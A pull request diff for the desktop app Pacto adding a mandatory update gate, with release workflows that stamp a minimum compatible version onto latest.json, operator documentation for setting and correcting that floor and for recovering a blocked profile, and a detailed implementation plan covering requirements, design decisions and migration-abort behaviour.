### PR TITLE
feature: mandatory update gate for breaking releases

### DIFF
--- a/.github/workflows/ci.yaml
+++ b/.github/workflows/ci.yaml
@@ -246,6 +246,6 @@ jobs:
         with:
           node-version: 24.18.0
 
-      - name: Run release manifest generator tests
-        run: node --test scripts/generate-release-manifest.test.mjs
+      - name: Run release script tests
+        run: node --test scripts/generate-release-manifest.test.mjs scripts/stamp-updater-compatibility.test.mjs
 

--- a/.github/workflows/release-compatibility.yaml
+++ b/.github/workflows/release-compatibility.yaml
@@ -1,0 +1,40 @@
+name: 'release-compatibility'
+
+# Re-stamps an already-published release's latest.json with a
+# minimum_compatible_version, without a rebuild. Use this to correct a wrong
+# value or to raise the floor on a release the automatic publish job already
+# stamped. See docs/build/OPERATOR_UPDATES.md for the operator procedure.
+
+on:
+  workflow_dispatch:
+    inputs:
+      tag:
+        description: 'Release tag to re-stamp (e.g. v0.5.2)'
+        required: true
+        type: string
+      override:
+        description: 'Minimum compatible version to stamp (defaults to the tracked scripts/release-compatibility.json value)'
+        required: false
+        type: string
+
+permissions:
+  contents: write
+
+jobs:
+  stamp-updater-compatibility:
+    permissions:
+      contents: write
+    runs-on: ubuntu-24.04
+    steps:
+      - uses: actions/checkout@v6
+
+      - uses: actions/setup-node@v6.4.0
+        with:
+          node-version: lts/*
+
+      - name: Stamp updater compatibility manifest
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          RELEASE_TAG: ${{ inputs.tag }}
+          OVERRIDE_MINIMUM_COMPATIBLE_VERSION: ${{ inputs.override }}
+        run: node scripts/stamp-updater-compatibility.mjs

--- a/.github/workflows/release.yaml
+++ b/.github/workflows/release.yaml
@@ -254,3 +254,23 @@ jobs:
           branch: "chore/bump-${{ github.ref_name }}"
           base: main
           delete-branch: true
+
+  stamp-updater-compatibility:
+    # Stamps the tracked minimum_compatible_version onto the release's
+    # latest.json so the in-app update gate can enforce it. See
+    # scripts/release-compatibility.json and release-compatibility.yaml for
+    # the correction path when the tracked value needs to change.
+    needs: publish-tauri
+    runs-on: ubuntu-24.04
+    steps:
+      - uses: actions/checkout@v6
+
+      - uses: actions/setup-node@v6.4.0
+        with:
+          node-version: lts/*
+
+      - name: Stamp updater compatibility manifest
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          RELEASE_TAG: ${{ github.ref_name }}
+        run: node scripts/stamp-updater-compatibility.mjs

--- a/docs/README.md
+++ b/docs/README.md
@@ -26,7 +26,7 @@ These docs are **tracked in git** and are the primary map for humans and coding 
 | **[CHAIN_TERMINOLOGY.md](./CHAIN_TERMINOLOGY.md)** | Canonical network keys (`local`, not `anvil`); one spelling per chain |
 | **[RUNTIME_CONFIG.md](./RUNTIME_CONFIG.md)** | Backend-owned `AppConfig` limits/flags over Tauri IPC: source of truth, Zod validation, fallback behavior, how to add a new limit |
 | **[audits/](./audits/)** | **Alpha / no external audit:** wallet and key-handling assurance posture ([README](./audits/README.md)) |
-| **[build/](./build/)** | Desktop build guides (macOS, Windows, Ubuntu) |
+| **[build/](./build/)** | Desktop build guides (macOS, Windows, Ubuntu); [OPERATOR_UPDATES.md](./build/OPERATOR_UPDATES.md) covers signed in-app updates and the [mandatory update gate](./build/OPERATOR_UPDATES.md#marking-a-release-as-breaking) |
 | **[testing/](./testing/)** | Test coverage status and backend phased testing plan ([README](./testing/README.md)) |
 
 **Cross-cutting:**

--- a/docs/build/OPERATOR_UPDATES.md
+++ b/docs/build/OPERATOR_UPDATES.md
@@ -71,3 +71,63 @@ Repeat on at least one additional desktop platform before promoting a release br
 - **macOS: update downloads but fails to install with "Failed to move the new app into place":** the app is likely sandboxed or installed with permissions that prevent replacing `/Applications/pacto.app`. Ensure the app is installed by dragging to `/Applications`, run `xattr -r -d com.apple.quarantine /Applications/pacto.app`, and approve any system prompt for administrator privileges.
 - **Unsigned builds and Gatekeeper:** Pacto is currently unsigned. On macOS, removing the quarantine attribute before first launch is required; otherwise Gatekeeper translocation can cause the updater to modify a temporary copy instead of the app in `/Applications`. On Windows, unsigned installers may trigger SmartScreen; users should choose "More info" → "Run anyway".
 - **Linux AppImage: blank window / `Could not create default EGL display: EGL_BAD_PARAMETER. Aborting...` on Wayland (Fedora, Arch, NixOS):** the AppImage bundles its own `libwebkit2gtk`; newer Ubuntu-built copies hit an upstream webkit2gtk EGL platform-detection bug on non-Ubuntu Wayland compositors, while the `.deb`/`.rpm` (which use the host's system `libwebkit2gtk`) are unaffected. `publish-tauri` now builds the `x86_64-unknown-linux-gnu` target on `ubuntu-22.04` — the oldest LTS still shipping `libwebkit2gtk-4.1-dev` — per Tauri's own guidance to build on the oldest supported base system. The `aarch64-unknown-linux-gnu` target stays on `ubuntu-24.04-arm` because the `glslc` apt package `whisper-rs`/`ggml-vulkan` needs at build time is not published for Ubuntu 22.04 (LunarG's Vulkan SDK, used on x86_64 instead, has no arm64 build); arm64 AppImage users may still hit this bug until an arm64-compatible `glslc` source is found.
+
+## Marking a release as breaking
+
+A release that ships an incompatible on-disk change (a new database migration older builds cannot read) must raise the update floor so older clients are told to update instead of failing to unlock their data. This is separate from ordinary version bumps — most releases do not need it.
+
+### Raising the floor ahead of a release
+
+1. Edit `scripts/release-compatibility.json` and raise `minimumCompatibleVersion` to the lowest version that can still safely open the on-disk data this release writes, e.g.:
+   ```json
+   { "minimumCompatibleVersion": "0.6.0" }
+   ```
+2. Commit it on the branch that will be tagged.
+3. Tag and push as usual (see **Release workflow** above). After the whole platform matrix in `publish-tauri` finishes, the `stamp-updater-compatibility` job in `.github/workflows/release.yaml` runs `node scripts/stamp-updater-compatibility.mjs`, downloads the just-published `latest.json`, merges in the tracked value as `minimum_compatible_version`, and re-uploads it to the same release. No separate step is required.
+
+**The tracked value must not exceed the version being released.** The stamping job validates the candidate against the release's own `version` field before it uploads anything; if `minimumCompatibleVersion` is higher than the tag, the job throws and refuses to publish the stamped manifest — the release keeps its installers but its `latest.json` is left unstamped (or stamped with whatever it already had), rather than being written with an impossible floor.
+
+**What clients below the floor experience:** on launch, a client whose installed version compares lower than `minimum_compatible_version` is shown a non-dismissible update-required screen — not a crash, and not a silent failure. The user cannot proceed into the app until they update.
+
+### Correcting a wrong value
+
+Use these in priority order.
+
+**1. Primary: re-run the dispatchable workflow.** `.github/workflows/release-compatibility.yaml` re-stamps an already-published tag's `latest.json` without a new signed release. Trigger it either from the GitHub Actions UI (`release-compatibility` workflow → **Run workflow**, fill in `tag` and optionally `override`), or from the CLI:
+   ```bash
+   gh workflow run release-compatibility.yaml -f tag=v0.6.0 -f override=0.5.4
+   ```
+   Omitting `override` re-stamps using whatever `minimumCompatibleVersion` is currently tracked in `scripts/release-compatibility.json` on the default branch. This runs the identical validator as the automatic post-release step, so an out-of-range value is refused the same way.
+
+**2. Emergency fallback: run the script locally.** If GitHub Actions itself is unavailable, someone with `gh` authenticated and push access to the repository can run the exact same script directly:
+   ```bash
+   node scripts/stamp-updater-compatibility.mjs v0.6.0 0.5.4
+   ```
+   The first argument is the tag, the second is the override value. This local invocation calls the same exported `validateMinimumVersion` / `mergeMinimumVersion` functions the automated job uses — it is not a bypass, and an out-of-range value fails the same validation.
+
+   **After using either path to correct a value, mirror the final value back into the tracked `scripts/release-compatibility.json` and commit it.** The workflow and the local script both operate on the *published* `latest.json` only; they never write the tracked file. If the tracked file is left at the old value, the next tagged release re-runs the automatic stamping job with that stale value and silently regresses the correction.
+
+## Recovering a machine the local storage-format check blocked
+
+This is a **different** trigger from the minimum-version check above: it never touches the network. It fires when the app opens a profile's `vector.db` on launch and finds a migration history that this build doesn't recognize — for example, a profile last opened by a newer or divergent build. Because the check runs before account selection, one bad profile blocks **every** account on that machine, not just the one it belongs to.
+
+The block screen deliberately does not show which npub or file path is at fault, so recovery is manual:
+
+1. Note the schema version number the block screen reports.
+2. Profile directories live under `<app_data_dir>/npub1…/vector.db` — see [`../storage-layout/SQLITE_AND_FILES.md`](../storage-layout/SQLITE_AND_FILES.md) for the full on-disk layout. `<app_data_dir>` here is Tauri's per-OS app data directory *including* this app's identifier (`io.pacto`, from `src-tauri/tauri.conf.json`):
+   - macOS: `~/Library/Application Support/io.pacto/`
+   - Windows: `%APPDATA%\io.pacto\`
+   - Linux: `$XDG_DATA_HOME/io.pacto/` (usually `~/.local/share/io.pacto/`)
+3. For each `npub1…` subdirectory, open its `vector.db` with a `sqlite3` client and check the highest applied version:
+   ```bash
+   sqlite3 "<app_data_dir>/npub1exampleaddress/vector.db" \
+     "SELECT version, name, applied_on FROM refinery_schema_history ORDER BY version DESC LIMIT 1;"
+   ```
+4. The one profile whose `version` matches the number from the block screen is the offender. Move that single directory aside (e.g. rename `npub1…` to `npub1…-quarantined`) — do not delete it.
+5. Relaunch the app. Every other account on the machine unblocks immediately; the moved-aside profile no longer participates in account discovery until it is restored (e.g. by a build that recognizes its schema).
+
+## Limits of this gate
+
+- **The manifest is unsigned.** `latest.json`, including `minimum_compatible_version`, carries no signature — only the platform installers themselves are Ed25519-signed. Anyone who can write to the release's assets can alter the manifest.
+- **The gate is forward-only.** It cannot reach installs from before this feature shipped; those clients have no code path that reads `minimum_compatible_version`.
+- **The remote (minimum-version) trigger fails open by design**, so anyone able to interfere with the manifest fetch — blackholing it or corrupting the response — can suppress it entirely for a given client. The local storage-format trigger above is the one that survives this: it never depends on the network, so it cannot be defeated the same way.

--- a/docs/plans/2026-08-05-001-feat-mandatory-update-gate-plan.md
+++ b/docs/plans/2026-08-05-001-feat-mandatory-update-gate-plan.md
@@ -1,0 +1,616 @@
+---
+title: Mandatory Update Gate for Breaking Releases - Plan
+type: feat
+date: 2026-08-05
+topic: mandatory-update-gate
+artifact_contract: ce-unified-plan/v1
+artifact_readiness: implementation-ready
+product_contract_source: ce-brainstorm
+execution: code
+deepened: 2026-08-05
+---
+
+# Mandatory Update Gate for Breaking Releases - Plan
+
+## Goal Capsule
+
+- **Objective:** Ship a mandatory update gate that blocks an incompatible client from using the app — via an operator-published compatibility signal and an independent local storage-format check — before it can touch MLS group state or be misrouted into "create a new account." The guarantee reaches only installs that already carry the gate; see the forward-only note in Dependencies and Assumptions.
+- **Product authority:** The Product Contract below governs product behavior. The Planning Contract governs implementation mechanism.
+- **Execution profile:** Land the storage-format classifier and the cleanup safety fix first: today's orphan-directory cleanup can delete an account whose database a newer build wrote, and that is a live data-loss path independent of the rest of the feature. Prove the version comparator with unit tests before anything depends on it — a wrong comparison locks users out of a working install. Land U6 with U7; U6's launch-ordering guarantee depends on U7's wrapper.
+- **Stop conditions:** Stop and report rather than guessing if the storage-format probe cannot classify a real pre-refinery profile without running migrations, if `check()` cannot be made to distinguish an unreachable endpoint from "no update available", or if the two-version smoke shows the gate blocking a compatible client.
+- **Tail ownership:** No commit, push, or PR without an explicit request; leave changes in the working tree for review.
+
+---
+
+## Product Contract
+
+### Summary
+
+Add a mandatory, non-dismissible update gate that blocks the whole app when the installed build is behind a breaking release, checked at every cold launch and unlock. Two independent triggers enter the same block: an operator-published minimum-compatible-version signal carried on the existing updater manifest, and a local check of on-disk storage format that runs before the app decides between onboarding and unlock. The plan also closes a destructive path research uncovered on the second trigger's route: today's orphan-account cleanup can delete a profile a newer build wrote. This sits alongside, and does not change, the existing opt-in "check for updates" flow.
+
+### Problem Frame
+
+Pacto's MLS layer has already had at least one breaking wire-format change (the MDK 0.8.0 upgrade, `docs/plans/2026-08-03-001-chore-nostr-mdk-044-upgrade-plan.md`), which required detecting and archiving an incompatible local store. Nothing stops a client that never received that update from continuing to run against group state it cannot correctly interpret. The existing update flow (`docs/plans/2026-07-17-001-feat-in-app-check-for-updates-plan.md`) is opt-in, off by default, and purely a courtesy notification; it has no way to compel an update ahead of a known-incompatible release. Its own follow-up list already names the missing piece: a launch-time check that runs before PIN unlock.
+
+The local half of the problem is sharper than the brainstorm assumed, and research pinned down exactly how it fails. The app database at `<app_data_dir>/<npub>/vector.db` is opened by three different paths at launch, and they disagree about what a future schema means.
+
+`refinery` aborts on a database it does not recognize. `verify_migrations` in `refinery-core` 0.9.2 runs with the default `abort_missing: true` and `abort_divergent: true`, and it aborts on three distinct conditions: an applied version with no matching embedded migration (`MissingVersion`), an applied version whose embedded counterpart differs (`DivergentVersion`), and an embedded versioned migration at or below the database's current version that was never applied (`MissingVersion` again). A build whose embedded set stops at V30 therefore refuses to migrate a profile a V31 build wrote, and `get_db_connection` — which calls `run_migrations` on every acquisition — fails after the PIN is accepted, with an error that names a migration rather than an incompatible install.
+
+`list_accounts` reaches the same database earlier and draws a different conclusion. It probes each `npub1*` directory with `account_has_valid_pkey`, which opens `vector.db` directly and reads `settings.pkey` without migrating. A future schema that keeps that row is classified `Include` and survives. One that renames or removes it returns `Ok(false)`, which `classify_account_scan` maps to `AccountScanVerdict::Delete`, and `list_accounts` calls `std::fs::remove_dir_all` on the profile. One that drops the `settings` table returns `Err`, which maps to `Skip`, leaving `check_any_account_exists` to report no account and the app to offer onboarding over data that is still on disk.
+
+So the same on-disk state produces an opaque migration error, a silent account deletion, or a false "create a new account" prompt, depending on which future migration happened to land. All three are the same missing check: nothing asks whether the running build recognizes the storage before it acts on it.
+
+### Key Decisions
+
+- KD1. **Whole-app block, not feature-scoped gating.** Simpler to build and reason about than gating MLS alone; accepted trade-off is that unrelated features (wallet, governance) are also blocked during an MLS-only incompatibility. *(session-settled: user-directed — chosen over blocking only the incompatible feature: simplicity, accepted trade-off.)* Governs R2, R7, R14.
+- KD2. **GitHub-hosted compatibility manifest, correctable without a new signed release.** Reuses the existing updater/release trust boundary (Ed25519-signed installers, `latest.json` discovery over HTTPS) rather than introducing a new relay-published signal; the relay-published alternative is deferred. *(session-settled: user-directed — chosen over a Nostr-relay-published signal: reuses proven infra, satisfies the fast-correction requirement without new relay-protocol surface.)* Governs R1, R3.
+- KD3. **Checks run only at cold launch and unlock; network-unreachable fails open.** Never interrupts an already-unlocked live session, and never locks a user out purely because the update-check endpoint was unreachable. *(session-settled: user-directed — chosen over mid-session interruption and fail-closed: avoids disrupting active use and avoids false lockouts from connectivity problems.)* Governs R4, R9.
+  - **Conflict call-out from security review:** fail-open is symmetric. Anyone who can interfere with the manifest fetch — blackhole the endpoint, corrupt the response into a parse failure — reaches the same path a genuine offline launch reaches, and the remote trigger silently does not fire. No signature forgery is needed, because the manifest is unsigned. This is the accepted cost of never locking a user out over connectivity, not an oversight; the local trigger (KD4) is what remains non-defeatable from the network.
+- KD4. **Local storage-format check as a second, network-independent trigger.** Runs before the app decides onboarding vs. unlock on every cold launch, closing the gap where KD3's fail-open behavior would otherwise let an offline client with unrecognized local data fall through to a false "create new account" prompt. *(session-settled: user-directed — chosen over relying on the remote signal alone: protects the offline case.)* Governs R5, R6, R12, R14.
+- KD5. **The gate is independent of the existing opt-in startup-check preference.** The mandatory gate is not something a user can opt out of by leaving "check for updates on startup" off; that toggle only ever governed the courtesy notification. Chosen over honoring the toggle, which would let the users most exposed to a breaking release opt out of learning about it. The accepted cost is real and worth naming for a privacy-differentiated product: a user who turned that toggle off specifically to stop the app contacting an external host now has it contact GitHub at every cold launch and unlock, with no opt-out. What bounds it is that the request is the same pinned endpoint the updater already used, carries no account identity, and reveals only that some install checked in. Governs R10.
+- KD6. **The local format check extends the existing MDK schema-history detection precedent rather than a new marker.** Reuses the proven legacy-store detection approach from the MDK 0.8.0 upgrade instead of adding a second, purpose-built format marker. *(session-settled: user-directed — chosen over a new purpose-built marker: reuses proven detection, less new surface.)* Governs R5, R6.
+- KD7. **The minimum-compatible-version is a new field on the existing `latest.json` manifest, not a separate file.** Reuses the fetch path the updater already has and the same asset-re-upload correction mechanism, rather than standing up a second endpoint. *(session-settled: user-directed — chosen over a separate compat manifest file: reuses the existing fetch path and correction mechanism.)* Governs R1, R3, R13.
+
+### Requirements
+
+**Compatibility signal (remote)**
+
+- R1. The app checks an operator-published minimum-compatible-version value at every cold launch and every unlock, before allowing use of the app.
+- R2. When the installed version is below the minimum-compatible-version, the app blocks all use of the app until the user updates.
+- R3. The minimum-compatible-version value is correctable by the operator without cutting a new signed app release.
+- R4. When the minimum-compatible-version check cannot be completed (offline, endpoint unreachable), the app does not block on that basis and continues its normal launch flow, subject to R6.
+- R13. The app blocks only on a minimum-compatible-version at or below the version the same manifest offers as the update. A higher, absent, or unparseable value is ignored and does not block.
+
+**Local storage-format detection**
+
+- R5. Before routing to onboarding (create/import account) or the unlock screen, the app inspects local account storage for a recognizable format.
+- R6. When local storage exists in a format the running build does not recognize, the app blocks with the same forced-update screen as R2 rather than routing to onboarding — including when the R1 check could not be completed.
+- R12. Orphan-account cleanup never deletes a profile directory whose storage the running build does not recognize.
+- R14. The block applies to the whole installation. One profile in an unrecognized format blocks every account on that machine, including profiles the build recognizes.
+
+**Blocking UX**
+
+- R7. The forced-update block screen is not dismissible and offers no path to proceed without updating.
+- R8. The forced-update block screen reuses the existing check/download/install/relaunch mechanics from the courtesy update flow, and where those mechanics cannot run — no reachable manifest, no platform asset — it names the release page instead of presenting a dead install action.
+- R9. A breaking-release block never interrupts an already-running, already-unlocked session; it applies only at the next cold launch or unlock.
+- R10. The forced-update gate operates independently of the existing opt-in "check for updates on startup" preference.
+
+**Operator workflow**
+
+- R11. Release operators have a documented way to mark a release as breaking (raise the minimum-compatible-version) and to correct that value quickly if set in error.
+
+### Actors
+
+- A1. **End user** — running the Pacto desktop app, potentially on any past release that carries the gate.
+- A2. **Release operator** — publishes releases and the minimum-compatible-version signal through the existing GitHub release pipeline.
+
+### Key Flows
+
+- F1. Remote-triggered block at cold launch
+  - **Trigger:** App launches or unlocks; the minimum-compatible-version check succeeds and the installed version is below it.
+  - **Actors:** A1
+  - **Steps:** App checks the compatibility signal before onboarding/unlock routing → version is below threshold and at or below the offered update → non-dismissible block screen appears → user downloads, installs, and relaunches.
+  - **Covers:** R1, R2, R7, R8, R13
+
+- F2. Local-format-triggered block at cold launch (offline)
+  - **Trigger:** App launches; the remote check in F1 cannot complete (fails open per R4); local account storage is in an unrecognized format.
+  - **Actors:** A1
+  - **Steps:** App inspects local storage before any account enumeration → format unrecognized → the profile is exempted from orphan cleanup → the same block screen appears instead of onboarding, for every account on the machine.
+  - **Covers:** R5, R6, R7, R12, R14
+
+- F3. Compatible client, normal launch
+  - **Trigger:** Installed version meets the minimum-compatible-version (or the check failed open) and local storage is recognized.
+  - **Actors:** A1
+  - **Steps:** App proceeds to onboarding or unlock as normal; this feature has no visible effect.
+  - **Covers:** R4, R9
+
+- F4. Operator marks a release breaking, then corrects a mistake
+  - **Trigger:** Operator ships a breaking release, or discovers the minimum-compatible-version was set incorrectly.
+  - **Actors:** A2
+  - **Steps:** Operator raises the tracked minimum-compatible-version alongside a breaking release and the release pipeline stamps it onto the published manifest; if set wrong, the operator republishes a corrected value against the same tag without cutting a new signed release.
+  - **Covers:** R3, R11
+
+### Acceptance Examples
+
+- AE1. **Given** a client several versions behind a breaking release, **when** it launches with the compatibility check reachable, **then** it is blocked before reaching onboarding or unlock. Covers R1, R2.
+- AE2. **Given** a client offline with local storage in an unrecognized format, **when** it launches, **then** it is blocked by the local format check even though the remote check failed open. Covers R4, R5, R6.
+- AE3. **Given** a client offline with local storage in a recognized format, **when** it launches, **then** it proceeds normally — no false lockout from the unreachable network check. Covers R4.
+- AE4. **Given** the app is already unlocked and running, **when** the operator publishes a breaking release mid-session, **then** the running session is not interrupted; the block applies at the next launch or unlock. Covers R9.
+- AE5. **Given** an operator mistakenly sets the minimum-compatible-version too high, **when** they publish a correction, **then** previously-blocked compatible clients unblock on their next check without a new signed release. Covers R3, R11.
+- AE6. **Given** a manifest whose minimum-compatible-version exceeds the version that same manifest offers, **when** a client reads it, **then** the client ignores the value and does not block. Covers R13.
+- AE7. **Given** a profile directory whose database this build does not recognize and whose `pkey` row it cannot read, **when** the app enumerates accounts at launch, **then** the directory is still on disk afterwards and the block screen is shown. Covers R12, R6.
+- AE8. **Given** a machine holding one profile the build recognizes and one it does not, **when** the app launches, **then** the recognized profile is also blocked until the unrecognized one is resolved. Covers R14.
+
+### Scope Boundaries
+
+- **Deferred for later:**
+  - Relay-published compatibility signal (publishing the minimum-compatible-version as a signed Nostr event on `TRUSTED_RELAYS` instead of a GitHub-hosted manifest).
+  - Feature-scoped gating (blocking only MLS messaging instead of the whole app).
+- **Out of scope:**
+  - Any change to the existing opt-in "check for updates on startup" flow's default or cadence.
+  - Interrupting an already-unlocked, already-running session.
+  - Classifying the MLS store (`<npub>/mls/vector-mls.db`) as part of the gate. KTD5 records why this is a constraint rather than a preference.
+  - Signing or otherwise authenticating `latest.json`. The manifest is unsigned today; KTD2 bounds the blast radius and Risks records what remains open.
+  - Per-profile blocking. R14 states the machine-wide behavior, and the gate's verdict is machine-wide because the routing decision it precedes is machine-wide. This is a structural consequence of where the check runs, not backlog.
+
+#### Deferred to Follow-Up Work
+
+- A gate-aware recovery path for a profile the running build cannot open — export, archive, or downgrade assistance. The gate tells the user to update, which is the correct remedy in every case this plan covers; a user who cannot update needs something this plan does not build, and U9 documents the manual route in the meantime.
+- Surfacing the compatibility floor anywhere in Settings alongside the installed version.
+
+### Dependencies and Assumptions
+
+- **The gate is forward-only.** A client can only be blocked if it already carries this code, so the first release containing the gate cannot protect anything shipped before it. Every install predating this feature stays reachable only through out-of-band messaging. The gate starts protecting the field one release after it lands.
+- `@tauri-apps/plugin-updater` is at `^2.10.1`; `rawJson` on the returned `Update` was added in plugin 2.4.0, so the field is available on the pinned version. `RemoteRelease`'s deserializer in the plugin sets no `deny_unknown_fields`, so an added manifest key is inert to the existing update path.
+- The gate's `check()` call must never pass `allowDowngrades`. The plugin's default comparator is `offered > current`, which is what makes KTD1's "null implies compatible" inference sound; `allowDowngrades` switches it to `offered != current` and silently invalidates that inference. Neither existing call site passes options, and the gate's must not either.
+- `latest.json` is unsigned. Only the installers carry Ed25519 signatures, verified against the `pubkey` in `src-tauri/tauri.conf.json`. HTTPS to a pinned `github.com` endpoint is the only integrity control on the manifest itself.
+- `tauri-apps/tauri-action@v1` offers no input for extra `latest.json` keys, so the field must be stamped onto the published asset after the release matrix completes.
+- `vector.db` is unencrypted SQLite with no `PRAGMA key`; `account_has_valid_pkey` already opens it before the PIN exists. A read-only schema probe before unlock is therefore possible.
+- `refinery` 0.9.2 runs with default `abort_missing: true` and `abort_divergent: true`, and `verify_migrations` compares every applied row against the embedded set, not only the highest. KTD3's probe reproduces all three of its abort conditions.
+- `embed_migrations!` is a compile-time macro, so there is no runtime window where the embedded set is unpopulated and the derived ceiling could read as zero. A build shipped with an incomplete embedded set is a build-time defect, guarded by the embedded-set assertion in the Verification Contract.
+- The release pipeline can rewrite a published asset in place: `.github/workflows/release.yaml:204` already does exactly this for `CHANGELOG.md` with `gh release upload … --clobber`.
+- Dev builds short-circuit the updater (`isDevBuild()` in `src/lib/updater/update-check.ts:11`), so the remote half of the gate is unverifiable outside a release build. `scripts/local-update-test.mjs` builds two versions and serves a local manifest, and U8 extends it to emit a minimum so the smoke test is runnable as written.
+- `switch_account` (`src-tauri/src/account_manager.rs:436`) is registered but has no frontend caller anywhere under `src/`. It is outside the gate's reach today because it is unreachable; a future consumer must not assume the gate covers it.
+- Svelte 5 compiles default-slot content passed into a runes-mode child as a lazily-invoked children snippet regardless of the parent's own mode, so wrapping the legacy layout's `{#if}/{:else}` block in a runes-mode `UpdateGate` genuinely defers `Login.svelte`'s `onMount`. KTD6's ordering premise depends on this and it is verified, not assumed.
+- A single global minimum-compatible-version applies across all platforms; no evidence surfaced of a platform-specific breaking change.
+
+### Outstanding Questions
+
+**Deferred (non-blocking)**
+
+- Q1. Whether the first breaking release after the gate ships warrants out-of-band messaging for pre-gate installs, which the gate cannot reach. This is a release-communications decision for that release, not a build decision here.
+
+### Sources and Research
+
+Verified in the repository on 2026-08-05:
+
+- Existing courtesy update flow: `src/lib/updater/update-check.ts` (state machine, `resolveInstalledVersion`, `friendlyErrorMessage`, `checkForUpdates`), `src/stores/startup-check.ts`, `src/lib/app/post-login-sync.ts:63-74` (`runStartupUpdateCheckIfEnabled`, the only caller of `checkForUpdates`), `src/components/updater/UpdateAvailableModal.svelte`, `src/components/updater/UpdateAvailablePanel.svelte` (subscribes to `updateStatus` directly; no `Modal` dependency; legacy syntax), `src/components/settings/AppSettingsSection.svelte`.
+- Launch routing: `src/routes/+layout.svelte:4,31-37` (the sole `<Login />` mount site), `src/components/auth/Login.svelte:23-35` (onboarding-vs-unlock decision) and `:145-149` (the existing `checking-screen` spinner), `src/stores/auth.ts:164` (`checkAuthStatus`), `:195` (`createAccount`, which calls `runPostLoginNetworkSync` at `:219` before `isAuthenticated.set(true)` at `:221`), `:243` (`importAccount`, which sets the flag at `:271` before syncing at `:279`), `:294` (`unlockWithPin`, syncing at `:306` before the flag at `:308`), and `src/stores/auth.test.ts` (existing suite covering all three).
+- Account enumeration and the destructive path: `src-tauri/src/account_manager.rs:92` (`list_accounts`, including `remove_dir_all` at `:121`), `:156` (`account_has_valid_pkey`, with its 2000 ms busy timeout at `:171`), `:187` (`classify_pkey_query_result`), `:222` (`classify_account_scan`), `:345` (WAL mode on `vector.db`).
+- Migration runner and abort semantics: `src-tauri/src/migrations/mod.rs:15` (`PRE_REFINERY_CEILING`), `:22` (`run_migrations`), `:80-117` (`baseline_existing_account`, which stamps history without validating table structure; `checksum` is a plain `VARCHAR(255)`), and `refinery-core` 0.9.2 `src/traits/mod.rs:14-92` (`verify_migrations` — the applied-row loop at `:22-51`, `MissingVersion` at `:28`, `DivergentVersion` at `:36`, and the unapplied-below-current case at `:69-88`) with `src/runner.rs:240-241` confirming the aborting defaults.
+- Format-detection precedent: `src-tauri/src/mls_store_reset.rs:51` (`history_version`), `:67` (`classify_version`), `:88` (`classify_store`, which needs the PIN-derived key for current stores and sets no busy timeout).
+- Rust test harness precedent: `tauri::test::mock_app()` with `get_profile_directory`, used in `src-tauri/src/crypto.rs:462-469` and `src-tauri/src/chat.rs:634-646`.
+- Updater plugin behavior: `tauri-apps/plugins-workspace` `plugins/updater/src/updater.rs` (the `RemoteRelease` deserializer with no `deny_unknown_fields`; the default `offered > current` comparator), `plugins/updater/guest-js/index.ts` (`CheckOptions`, `Update.rawJson`, `check()` resolving `null`), plugin `CHANGELOG.md` 2.4.0 (`rawJson` introduction).
+- Release pipeline: `.github/workflows/release.yaml:8-9,61-62` (explicit `contents: write` scoping), `:181-204` (`tauri-action` with `uploadUpdaterJson: true`, then the `--clobber` re-upload), `:206` (`update-homebrew-tap` as the existing `needs: publish-tauri` precedent), `src-tauri/tauri.conf.json` updater block, `docs/build/OPERATOR_UPDATES.md`, `scripts/local-update-test.mjs` (`generateManifest` emits only `version`, `notes`, `pub_date`, `platforms`), `scripts/generate-release-manifest.mjs`.
+- CI gates and script-test convention: `.github/workflows/ci.yaml` (`pnpm check`, `pnpm lint`, `pnpm check:tauri-commands`, `pnpm test:coverage`, `pnpm test:e2e`, `cargo test --lib --no-default-features`), `:249-250` (`node --test scripts/generate-release-manifest.test.mjs`), `vite.config.ts:73` confirming vitest collects only `src/**/*.test.ts`, and `Makefile:45` (`dev-sandbox`).
+- Capability model: custom app commands carry no entry in `src-tauri/capabilities/`; `check_any_account_exists` and `list_all_accounts` are registered in `generate_handler!` with no capability ACL, confirming a new command needs none.
+- Command-wiring rule: `docs/solutions/logic-errors/orphaned-relay-health-monitor-command.md`, enforced by `scripts/check-orphaned-tauri-commands.mjs` — also the repo's precedent for statically enforcing a cross-cutting invariant in CI.
+- SQLite WAL read semantics: https://www.sqlite.org/wal.html section 5 — a read-only open of a WAL database may recover the wal-index and write `-shm`.
+
+---
+
+## Planning Contract
+
+### Product Contract preservation
+
+Changed: added R12, R13, R14, AE6, AE7, AE8, and Q1; resolved and removed both `Deferred to Planning` questions. R12 is the confirmed scope addition — research found `list_accounts` can delete a profile whose `pkey` row a future schema moved, which is worse than the mis-routing the Problem Frame originally described. R13 is the client-side cap on the published minimum, added so a mistyped or tampered value fails open instead of locking the fleet out; KD7 now governs it. R14 states the machine-wide scope of the block, which was previously described only in Scope Boundaries and System-Wide Impact and therefore had no acceptance example and no verification gate; it documents behavior KD1 and KD4 already implied rather than adding scope. R8 gained a clause for the case where the install mechanics cannot run, which the offline trigger makes reachable. KD3 gained a conflict call-out from security review recording that fail-open is symmetric and defeatable, and KD5 gained the rationale it was missing, naming the privacy cost of contacting GitHub unconditionally. Neither decision changed. The ordering question resolves in KTD6 and the block-screen treatment in KTD9. KD1–KD7 and R1–R11 are otherwise unchanged in meaning and ID.
+
+### Key Technical Decisions
+
+- KTD1. **Read the minimum out of the launch `check()`'s `rawJson`, and route that same result into the shared `updateStatus` store.** The plugin already fetches the configured endpoint and hands back the untouched manifest, so a hand-rolled second HTTP path would duplicate the endpoint config, the timeout handling, and the proxy support for no gain. `check()` resolving `null` means the installed build is at or above the offered version, which under R13's cap means it is also at or above the minimum — so the null case needs no manifest at all. The result must land in `updateStatus` rather than a private field, because that store is what `UpdateAvailablePanel` reads and is therefore what makes R8's install action live on the block screen. One memoized per-launch `check()` promise serves both the gate and the courtesy flow; sharing the network primitive does not weaken R10, because the gate's decision still runs regardless of the opt-in preference. Governs R1, R2, R8, R10.
+- KTD2. **Ignore a minimum greater than the manifest's own `version`, and reject the same condition on every publish path.** The manifest is unsigned, so without a cap one bad value blocks every install with no in-app recovery. Capping at the version the manifest actually offers means a block is always paired with an update the client can install and verify. Enforcing it in both places is deliberate: the publish-time check catches operator error early, the client-side check is what actually protects users, because it also covers a manifest the pipeline never wrote. The cap is a real control against a mistyped value and against a network attacker facing a pinned `github.com` endpoint; it is not a control against a compromised release or a malicious operator, whose reach is bounded only by the installer-signing boundary. Governs R13, R3.
